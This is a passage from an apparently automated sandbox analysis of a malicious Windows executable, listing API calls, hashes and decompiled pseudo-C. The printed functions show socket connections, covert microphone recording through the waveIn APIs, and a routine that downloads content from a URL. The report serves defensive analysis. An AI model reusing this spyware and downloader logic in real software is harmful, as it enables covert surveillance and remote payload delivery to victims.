                                            • Part of subcall function 00402168: connect.WS2_32(00415A30,00415A34,00000010), ref: 0040217E
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,funready,00415268,00000000,?,?,?,00415988), ref: 004060A9
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,00415988), ref: 004060C5
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,00415988), ref: 004060B3
                                            • Part of subcall function 00402198: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,00415A30,00415940,?,0040A446), ref: 004021A7
                                            • Part of subcall function 00402198: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004021BA
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,getfunlib,00415268,00000000,?,?,?,00415988), ref: 004060EC
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,00415988), ref: 004060F6
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,00415988), ref: 00406108
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,00415988), ref: 00406111
                                            • Part of subcall function 0040EDD3: ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(?,?,00415940,00415268,00415268,00000000,00415268,00000000), ref: 0040EDE3
                                            • Part of subcall function 0040EDD3: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(004118A0,00000000,?,00415940,00415268,00415268,00000000,00415268,00000000), ref: 0040EDF4
                                            • Part of subcall function 0040EDD3: ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(?,00415940,00415268,00415268,00000000,00415268,00000000), ref: 0040EDFD
                                            • Part of subcall function 0040EDD3: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,00415940,00415268,00415268,00000000,00415268,00000000), ref: 0040EE0A
                                            • Part of subcall function 0040EDD3: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,00415940,00415268,00415268,00000000,00415268,00000000), ref: 0040EE15
                                            • Part of subcall function 0040EDD3: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(hRA,?,00415940,00415268,00415268,00000000,00415268,00000000), ref: 0040EE34
                                            • Part of subcall function 0040EDD3: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,00415940,00415268,00415268,00000000,00415268,00000000), ref: 0040EE3D
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.299950040.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: V?$allocator@$U?$char_traits@$D@std@@$D@2@@std@@$??1?$basic_string@$D@2@@0@Hstd@@V?$basic_string@$??0?$basic_string@G@2@@std@@G@std@@$?c_str@?$basic_string@?length@?$basic_string@V01@@V10@0@V10@@$D@1@@connectsocket
                                          • String ID: funready$getfunlib
                                          • API String ID: 325875447-1077912798
                                          • Opcode ID: 5fa60852b65b47e2a6ed33d628b531b91edfa84125d12b179fb2feb604901ce3
                                          • Instruction ID: 70f68d2a33a774611a59a187b4e42018cf206f473d21f4c0636caec103ff2ad2
                                          • Opcode Fuzzy Hash: 5fa60852b65b47e2a6ed33d628b531b91edfa84125d12b179fb2feb604901ce3
                                          • Instruction Fuzzy Hash: A011A571A40615A6DB04B7B1AC4BDFF726CAA85304F04093EF901761C2E9BC5958466D
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,758EFF80,00415268,?,?,?,?,?,?,?,?,?,?,00408716,?), ref: 0040E6CA
                                          • time.MSVCRT ref: 0040E6E2
                                          • srand.MSVCRT ref: 0040E6EF
                                          • rand.MSVCRT ref: 0040E703
                                          • rand.MSVCRT ref: 0040E717
                                          • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@D@Z.MSVCP60(?,?,?,?,?,?,?,?,?,00408716,?), ref: 0040E72A
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,00408716,?), ref: 0040E73A
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,00408716,?), ref: 0040E743
                                          Strings
                                          • abcdefghijklmnopqrstuvwxyz, xrefs: 0040E6D2
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.299950040.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: V?$allocator@$D@2@@std@@D@std@@U?$char_traits@$??0?$basic_string@rand$??1?$basic_string@D@1@@V01@V01@@Y?$basic_string@srandtime
                                          • String ID: abcdefghijklmnopqrstuvwxyz
                                          • API String ID: 3357298394-1277644989
                                          • Opcode ID: 61b4d72e65c601405d3fc08df9816bbbc004d5cb0974ce55ff798480f3e55148
                                          • Instruction ID: 1fb110d2ec9980bb9f4c5b47183564c597e57a5cf9685dcf05f4e26dd2d8a7df
                                          • Opcode Fuzzy Hash: 61b4d72e65c601405d3fc08df9816bbbc004d5cb0974ce55ff798480f3e55148
                                          • Instruction Fuzzy Hash: 6311CC7750011D9BCB04EBA1ED49AEF7B78EB40311F104436F901971D0DA7A9945CB68
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 28%
                                          			E004026F2(void* __ecx, intOrPtr _a4, char _a7) {
                                          				struct _SYSTEMTIME _v20;
                                          				char _v36;
                                          				void* _v52;
                                          				char* _t24;
                                          				char* _t25;
                                          				intOrPtr _t33;
                                          				void* _t35;
                                          
                                          				_t35 = __ecx;
                                          				if( *((char*)(__ecx + 0x34)) == 0) {
                                          					return 0;
                                          				}
                                          				_t33 = _a4;
                                          				if( *0x415938 != 0 &&  *((intOrPtr*)(__ecx + 0x38)) != _t33) {
                                          					GetLocalTime( &_v20);
                                          					_t24 =  &_a7;
                                          					__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z("%02i:%02i:%02i:%03i [KeepAlive] ", _t24, "Timeout changed to %i\n", _v20.wHour & 0x0000ffff, _v20.wMinute & 0x0000ffff, _v20.wSecond & 0x0000ffff, _v20.wMilliseconds & 0x0000ffff, _t33);
                                          					_t25 =  &_v36;
                                          					L0040FC20();
                                          					__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ(_t25, _t24);
                                          					printf(_t25);
                                          					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                          					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                          				}
                                          				 *(_t35 + 0x3c) =  *(_t35 + 0x3c) & 0x00000000;
                                          				 *((intOrPtr*)(_t35 + 0x38)) = _t33;
                                          				return 1;
                                          			}










                                          0x004026f9
                                          0x004026ff
                                          0x00000000
                                          0x0040278a
                                          0x0040270d
                                          0x00402710
                                          0x0040271b
                                          0x00402739
                                          0x00402747
                                          0x0040274e
                                          0x00402752
                                          0x0040275c
                                          0x00402763
                                          0x0040276f
                                          0x00402778
                                          0x00402778
                                          0x0040277e
                                          0x00402782
                                          0x00000000

                                          APIs
                                          • GetLocalTime.KERNEL32(?,758EFF80,00415A30,?,?,?,?,?,?,?,?,?,?,?,0040A946,?), ref: 0040271B
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(%02i:%02i:%02i:%03i [KeepAlive] ,?,Timeout changed to %i,?,?,0040A946,?,?), ref: 00402747
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,0040A946,?), ref: 00402752
                                          • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040A946,?), ref: 0040275C
                                          • printf.MSVCRT ref: 00402763
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040276F
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00402778
                                          Strings
                                          • Timeout changed to %i, xrefs: 0040273C
                                          • %02i:%02i:%02i:%03i [KeepAlive] , xrefs: 00402742
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.299950040.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??1?$basic_string@$??0?$basic_string@?c_str@?$basic_string@D@1@@D@2@@0@Hstd@@LocalTimeV10@V?$basic_string@printf
                                          • String ID: %02i:%02i:%02i:%03i [KeepAlive] $Timeout changed to %i
                                          • API String ID: 1710008465-867111061
                                          • Opcode ID: 808450fb4774ad14a115e835dc756668e8b689d331a4670f9e89f49d9f85dff4
                                          • Instruction ID: cc00f5fe8abc897b27b5181be741a8fd0fdef4b4223a36fb38de5ceb1cc1b4cc
                                          • Opcode Fuzzy Hash: 808450fb4774ad14a115e835dc756668e8b689d331a4670f9e89f49d9f85dff4
                                          • Instruction Fuzzy Hash: 16117B72800214BBCB509BE5DD4DEEFB7BCBB44715F144477F442A2190D6B8A584CB68
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 28%
                                          			E00402791(void* __ecx, intOrPtr _a4, char _a7) {
                                          				struct _SYSTEMTIME _v20;
                                          				char _v36;
                                          				void* _v52;
                                          				char* _t22;
                                          				char* _t23;
                                          				void* _t30;
                                          				intOrPtr _t35;
                                          
                                          				_t30 = __ecx;
                                          				if( *((intOrPtr*)(__ecx + 0x34)) == 0) {
                                          					return 0;
                                          				}
                                          				_t35 =  *0x415938; // 0x0
                                          				if(_t35 != 0 && _a4 == 0) {
                                          					GetLocalTime( &_v20);
                                          					_t22 =  &_a7;
                                          					__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z("%02i:%02i:%02i:%03i [KeepAlive] ", _t22, "Disabled.\n", _v20.wHour & 0x0000ffff, _v20.wMinute & 0x0000ffff, _v20.wSecond & 0x0000ffff, _v20.wMilliseconds & 0x0000ffff);
                                          					_t23 =  &_v36;
                                          					L0040FC20();
                                          					__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ(_t23, _t22);
                                          					printf(_t23);
                                          					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                          					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                          				}
                                          				 *((char*)(_t30 + 0x35)) = 1;
                                          				return 1;
                                          			}










                                          0x00402798
                                          0x0040279f
                                          0x00000000
                                          0x0040281c
                                          0x004027a1
                                          0x004027a7
                                          0x004027b2
                                          0x004027cf
                                          0x004027dd
                                          0x004027e4
                                          0x004027e8
                                          0x004027f2
                                          0x004027f9
                                          0x00402805
                                          0x0040280e
                                          0x0040280e
                                          0x00402814
                                          0x00000000

                                          APIs
                                          • GetLocalTime.KERNEL32(?,00415A30,?,?,?,?,?,?,?,?,?,?,?,?,004022CD,00000001), ref: 004027B2
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(%02i:%02i:%02i:%03i [KeepAlive] ,?,Disabled.,?,?,?,?), ref: 004027DD
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,004022CD,00000001), ref: 004027E8
                                          • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,004022CD), ref: 004027F2
                                          • printf.MSVCRT ref: 004027F9
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00402805
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040280E
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.299950040.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??1?$basic_string@$??0?$basic_string@?c_str@?$basic_string@D@1@@D@2@@0@Hstd@@LocalTimeV10@V?$basic_string@printf
                                          • String ID: %02i:%02i:%02i:%03i [KeepAlive] $Disabled.
                                          • API String ID: 1710008465-2552289483
                                          • Opcode ID: 3267047b5620e5403b2cf5c74a9a0aa7daad7e6dba77e29f4ce0e4a6586bfbfa
                                          • Instruction ID: 26824cefd2d391b63e7f360a9efe5498c18b65437e815fb1cf45070ddafa23bd
                                          • Opcode Fuzzy Hash: 3267047b5620e5403b2cf5c74a9a0aa7daad7e6dba77e29f4ce0e4a6586bfbfa
                                          • Instruction Fuzzy Hash: FE11A176800218BBCF50EBE4DD0D8EE77BCAA45300B008577F842A21D1DAB89A88C779
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(?,?,00415940,00415268,00415268,00000000,00415268,00000000), ref: 0040EDE3
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(004118A0,00000000,?,00415940,00415268,00415268,00000000,00415268,00000000), ref: 0040EDF4
                                          • ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(?,00415940,00415268,00415268,00000000,00415268,00000000), ref: 0040EDFD
                                          • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,00415940,00415268,00415268,00000000,00415268,00000000), ref: 0040EE0A
                                          • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,00415940,00415268,00415268,00000000,00415268,00000000), ref: 0040EE15
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(hRA,?,00415940,00415268,00415268,00000000,00415268,00000000), ref: 0040EE34
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,00415940,00415268,00415268,00000000,00415268,00000000), ref: 0040EE3D
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.299950040.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: V?$allocator@$U?$char_traits@$D@2@@std@@D@std@@$G@2@@std@@G@std@@$??0?$basic_string@?c_str@?$basic_string@?length@?$basic_string@$??1?$basic_string@D@1@@V01@@
                                          • String ID: hRA$hRA
                                          • API String ID: 2647928144-3777161688
                                          • Opcode ID: 70c260e072eb46f2d6d8b5b222665c27e8336ff8b799b378cd1156fa49a8c359
                                          • Instruction ID: 2d0384a5b8d7644f76aacc237b36b5e03aa9b3646a5a52e53ad8478f9338e915
                                          • Opcode Fuzzy Hash: 70c260e072eb46f2d6d8b5b222665c27e8336ff8b799b378cd1156fa49a8c359
                                          • Instruction Fuzzy Hash: 92011A35600109ABCB04EBA8E89D8EE77B9FB84251B408179F907D7290DBB09E49CB64
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDI@Z.MSVCP60(?,00000000,7313CB00,?,?,0040E644,?), ref: 0040EEE3
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,0040E644,?), ref: 0040EF01
                                          • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,0040E644,?), ref: 0040EF09
                                          • ?replace@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@IIPBD@Z.MSVCP60(00000000,00000000,?,?,0040E644,?), ref: 0040EF14
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000,?,?,0040E644,?), ref: 0040EF1E
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,0040E644,?), ref: 0040EF27
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,0040E644,?), ref: 0040EF36
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,0040E644,?), ref: 0040EF3F
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.299950040.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: V?$allocator@$D@2@@std@@D@std@@U?$char_traits@$??0?$basic_string@$??1?$basic_string@V01@@$?find@?$basic_string@?length@?$basic_string@?replace@?$basic_string@D@1@@V12@
                                          • String ID: D@
                                          • API String ID: 3577381420-217608370
                                          • Opcode ID: 64957e4059d4a5a3af3f2383b2cb762eef85518bada7f33c27665136f667c68a
                                          • Instruction ID: d4362ae4465ef3a6c70cc0c136aafbc0d12dcd70d9c8d064c5fd94e1c76eb894
                                          • Opcode Fuzzy Hash: 64957e4059d4a5a3af3f2383b2cb762eef85518bada7f33c27665136f667c68a
                                          • Instruction Fuzzy Hash: 4E01A53550011EEFCF049F64EC9C9EA7B79FB44315B108464FC16972A0DB78AE55CB58
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 47%
                                          			E00401883(CHAR* __eax, void* __eflags) {
                                          				char* _t4;
                                          				signed int _t5;
                                          				CHAR* _t10;
                                          				signed int _t11;
                                          				signed int _t19;
                                          				signed int _t20;
                                          				intOrPtr* _t26;
                                          				void* _t27;
                                          
                                          				_t27 = __eflags;
                                          				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                          				CreateDirectoryA(__eax, 0);
                                          				0x4151d8->wFormatTag = 1;
                                          				 *0x4151da = 1;
                                          				 *0x4151dc = 0x1f40;
                                          				 *0x4151e6 = 8;
                                          				 *0x4151e0 = 0x1f40;
                                          				 *0x4151e4 = 1;
                                          				 *0x4151e8 = 0;
                                          				_t4 = E00401289(0x415940, _t27, 0x24);
                                          				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                          				_t5 = atoi(_t4);
                                          				_t19 =  *0x4151dc; // 0x0
                                          				 *_t26 = 0x30008;
                                          				_t20 = _t19 * _t5 * 0x3c;
                                          				 *0x415190 = _t20;
                                          				 *0x415198 = (( *0x4151e6 & 0x0000ffff) >> 3) * _t20;
                                          				_t10 = waveInOpen(0x4151d0, 0xffffffff, 0x4151d8, E004019AA, 0, ??);
                                          				__imp__?resize@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEXI@Z( *0x415198);
                                          				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                          				0x415160->lpData = _t10;
                                          				_t11 =  *0x415198; // 0x0
                                          				 *0x415164 = _t11;
                                          				 *0x415168 = 0;
                                          				 *0x41516c = 0;
                                          				 *0x415170 = 0;
                                          				 *0x415174 = 0;
                                          				waveInPrepareHeader( *0x4151d0, 0x415160, 0x20);
                                          				waveInAddBuffer( *0x4151d0, 0x415160, 0x20);
                                          				waveInStart( *0x4151d0);
                                          				return 0;
                                          			}











                                          0x00401883
                                          0x0040188d
                                          0x00401894
                                          0x004018a6
                                          0x004018af
                                          0x004018b8
                                          0x004018bd
                                          0x004018c6
                                          0x004018cb
                                          0x004018d4
                                          0x004018db
                                          0x004018e2
                                          0x004018e9
                                          0x004018f2
                                          0x004018f8
                                          0x004018ff
                                          0x00401921
                                          0x00401927
                                          0x0040192c
                                          0x0040193f
                                          0x00401947
                                          0x00401955
                                          0x0040195a
                                          0x00401965
                                          0x0040196a
                                          0x00401970
                                          0x00401976
                                          0x0040197c
                                          0x00401982
                                          0x00401991
                                          0x0040199d
                                          0x004019a7

                                          APIs
                                          • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 0040188D
                                          • CreateDirectoryA.KERNEL32(00000000), ref: 00401894
                                          • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000024), ref: 004018E2
                                          • atoi.MSVCRT ref: 004018E9
                                          • waveInOpen.WINMM(004151D0,000000FF,004151D8,004019AA,00000000), ref: 0040192C
                                          • ?resize@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEXI@Z.MSVCP60 ref: 0040193F
                                          • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 00401947
                                          • waveInPrepareHeader.WINMM(00415160,00000020), ref: 00401982
                                          • waveInAddBuffer.WINMM(00415160,00000020), ref: 00401991
                                          • waveInStart.WINMM ref: 0040199D
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.299950040.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@wave$?c_str@?$basic_string@$?resize@?$basic_string@BufferCreateDirectoryHeaderOpenPrepareStartatoi
                                          • String ID:
                                          • API String ID: 1105965448-0
                                          • Opcode ID: 1c0ea7c4ecf195e60b421314d626c75882c3edba1827f109d9b046417a45d593
                                          • Instruction ID: bf27eddb9491d6ca11d4abd4b36827af5ed132d13cec366d9f467bf0129c0db4
                                          • Opcode Fuzzy Hash: 1c0ea7c4ecf195e60b421314d626c75882c3edba1827f109d9b046417a45d593
                                          • Instruction Fuzzy Hash: D221E371E50A00FBC7469F65EC4CBDA7AA4FBC8315B50813AE905D62B0EBF94880CB4C
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 91%
                                          			E0040E750(void* __ecx, void* __eflags, char* _a4, void** _a8, long _a12, signed int _a15) {
                                          				void* _v8;
                                          				char* _v12;
                                          				void* _v16;
                                          				void _v10016;
                                          				void* _t35;
                                          				void* _t36;
                                          				void* _t42;
                                          				void* _t44;
                                          				void* _t46;
                                          				void* _t49;
                                          				unsigned int* _t56;
                                          				signed int _t58;
                                          				signed int _t59;
                                          				signed int _t65;
                                          				signed int _t75;
                                          				char* _t99;
                                          				void* _t101;
                                          				void* _t102;
                                          				void* _t103;
                                          				void* _t104;
                                          
                                          				E0040FCF0(0x271c, __ecx);
                                          				_t56 = _a12;
                                          				_a15 = _a15 & 0x00000000;
                                          				_t99 = 0;
                                          				 *_a8 = 0;
                                          				 *_t56 = 0;
                                          				_t35 = InternetOpenA("user", 1, 0, 0, 0);
                                          				_v16 = _t35;
                                          				_t36 = InternetOpenUrlA(_t35, _a4, 0, 0, 0x80000000, 0);
                                          				_v8 = _t36;
                                          				if(_t36 != 0) {
                                          					_a12 = 0;
                                          					_a4 = 0;
                                          					while(1) {
                                          						_t42 = InternetReadFile(_v8,  &_v10016, 0x2710,  &_a12);
                                          						if(_t42 != 0 && _a12 <= _t99) {
                                          							break;
                                          						}
                                          						_t44 =  *_t56 + _a12;
                                          						_push(_t44);
                                          						L0040FCCC();
                                          						_t58 =  *_t56;
                                          						_t101 = _a4;
                                          						_t59 = _t58 >> 2;
                                          						_v12 = memcpy(_t44, _t101, _t59 << 2);
                                          						_t46 = memcpy(_t101 + _t59 + _t59, _t101, _t58 & 0x00000003);
                                          						_t102 =  &_v10016;
                                          						_t65 = _a12 >> 2;
                                          						_t49 = memcpy(_t102 + _t65 + _t65, _t102, memcpy(_t46 +  *_t56, _t102, _t65 << 2) & 0x00000003);
                                          						_t104 = _t104 + 0x30;
                                          						E0040FC2C(_t49, _a4);
                                          						_a4 = _v12;
                                          						 *_t56 =  *_t56 + _a12;
                                          						_t99 = 0;
                                          					}
                                          					_push( *_t56);
                                          					L0040FCCC();
                                          					_t103 = _a4;
                                          					 *_a8 = _t42;
                                          					_t75 =  *_t56 >> 2;
                                          					memcpy(_t103 + _t75 + _t75, _t103, memcpy(_t42, _t103, _t75 << 2) & 0x00000003);
                                          					_a15 = 1;
                                          				}
                                          				InternetCloseHandle(_v16);
                                          				InternetCloseHandle(_v8);
                                          				return _a15;
                                          			}























                                          0x0040e758
                                          0x0040e761
                                          0x0040e765
                                          0x0040e769
                                          0x0040e770
                                          0x0040e777
                                          0x0040e779
                                          0x0040e78a
                                          0x0040e78e
                                          0x0040e796
                                          0x0040e799
                                          0x0040e7a0
                                          0x0040e7a3
                                          0x0040e7a6
                                          0x0040e7b9
                                          0x0040e7c1
                                          0x00000000
                                          0x00000000
                                          0x0040e7ca
                                          0x0040e7cd
                                          0x0040e7ce
                                          0x0040e7d3
                                          0x0040e7d5
                                          0x0040e7dc
                                          0x0040e7e3
                                          0x0040e7ec
                                          0x0040e7f7
                                          0x0040e7fd
                                          0x0040e807
                                          0x0040e807
                                          0x0040e809
                                          0x0040e812
                                          0x0040e818
                                          0x0040e81b
                                          0x0040e81b
                                          0x0040e81f
                                          0x0040e821
                                          0x0040e827
                                          0x0040e82f
                                          0x0040e835
                                          0x0040e83f
                                          0x0040e841
                                          0x0040e845
                                          0x0040e84f
                                          0x0040e854
                                          0x0040e85c

                                          APIs
                                          • InternetOpenA.WININET(user,00000001,00000000,00000000,00000000), ref: 0040E779
                                          • InternetOpenUrlA.WININET(00000000,?,00000000,00000000,80000000,00000000), ref: 0040E78E
                                          • InternetReadFile.WININET(?,?,00002710,?), ref: 0040E7B9
                                          • ??2@YAPAXI@Z.MSVCRT ref: 0040E7CE
                                          • ??2@YAPAXI@Z.MSVCRT ref: 0040E821
                                          • InternetCloseHandle.WININET(?), ref: 0040E84F
                                          • InternetCloseHandle.WININET(?), ref: 0040E854
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.299950040.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: Internet$??2@CloseHandleOpen$FileRead
                                          • String ID: user
                                          • API String ID: 2072504707-2375276105
                                          • Opcode ID: 2ee8c07cc1f150707620ff4239a6abc9e9cbbd7c46878338fda33a680a787436
                                          • Instruction ID: eb539ee71474eb75c57a488c0914650f16280e3af79cc5ff73f90012e5c67050
                                          • Opcode Fuzzy Hash: 2ee8c07cc1f150707620ff4239a6abc9e9cbbd7c46878338fda33a680a787436
                                          • Instruction Fuzzy Hash: 5F317932900228ABCF25DF69D885ADF7BA5FF09350F14806AF909A7290C6749A54DB94
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 53%
                                          			E004042AA() {
                                          				intOrPtr _v8;
                                          				char _v24;
                                          				long _t11;
                                          				char* _t12;
                                          				void* _t15;
                                          				void* _t16;
                                          				void* _t25;
                                          				void* _t26;
                                          				intOrPtr _t27;
                                          
                                          				_t25 = _t16;
                                          				 *((char*)(_t25 + 0x39)) = 1;
                                          				_t11 = CreateEventA(0, 0, 0, 0);
                                          				 *(_t25 + 0x30) = _t11;
                                          				_t15 = _t25 + 0x14;
                                          				L1:
                                          				__imp__??9std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z(_t15, 0x410668);
                                          				if(_t11 != 0) {
                                          					_t27 = _t26 - 0x10;
                                          					_t12 =  &_v24;
                                          					_v8 = _t27;
                                          					L0040FC1A();
                                          					L0040FC14();
                                          					_t26 = _t27 + 0x18;
                                          					E00402198(0x415a30, _v8);
